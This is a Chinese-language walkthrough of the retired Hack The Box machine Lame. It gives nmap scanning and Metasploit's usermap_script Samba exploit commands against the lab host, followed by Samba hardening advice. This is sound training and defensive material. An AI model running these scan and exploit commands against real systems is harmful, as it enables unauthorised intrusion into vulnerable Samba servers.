本文作者:shavchen
01
前言
这次挑战的靶机是Lame,距今900天 ,历史感十足
>>>>
靶机描述
Lame is a beginner level machine, requiring only one exploit to obtain root access.
It was the first machine published on Hack The Box and was often the first machine for new users prior to its
retirement.
技能收获:Smaba漏洞利用
02
信息收集
>>>>
基本信息
Kali ip :10.10.14.3
Lameip:10.10.10.3
通信正常,延时偏高
>>>>
端口扫描
代码语言:javascript复制nmap -sV -A -p- 10.10.10.3
啊,Samba
03
漏洞利用
靶机开启了Smaba服务,那还有什么好说的
代码语言:javascript复制search Samba
选择exploit/multi/samba/usermap_script
代码语言:javascript复制use exploit/multi/samba/usermap_script
set rhosts 10.10.10.3
exploit
emem,至此完成?靶机简单,那我们加固一下吧
04
安全加固
查看samba版本
修改配置文件,位置:/etc/samba/smb.conf
- 不使用明文密码 #加入参数 encrypt passwords=yes smb passwd file=/etc/samba/smbpasswd 这样,当security=user时,通过/etc/samba/smbpasswd文件进行验证,验证过程无明码传输
- 不使用共享级别的安全 当security=share的时候,samba安全性比较差,灵活性不强,所以应避免使用共享级别安全
- 限制网络接口访问 这个适用于多网卡用户,限制samba只响应来自内网的用户请求 interfaces=192.168.1.1/24 127.0.0.1 bind interfaces only=yes
- 控制访问列表 #ip控制 hosts deny=ALL hosts allow=192.168.1.0/24 127.0.0.1 #主机控制 hosts deny=ALL hosts allow=win01,win02,win05 #用户控制,允许用户smb01,smb02与组samba,admin访问 valid users=smb01,smb02,@samba@admin
- 配置iptables samba经常被配置在有双网卡的机器上,samba做为内网专用服务,应该隔绝外网以保护samba,这里可以使用iptables封锁以下端口,不允许外网访问137,138,139端口! iptables -t filter -A INPUT -p tcp --dport 139 -j DROP
- 升级samba版本 apt-get install samba
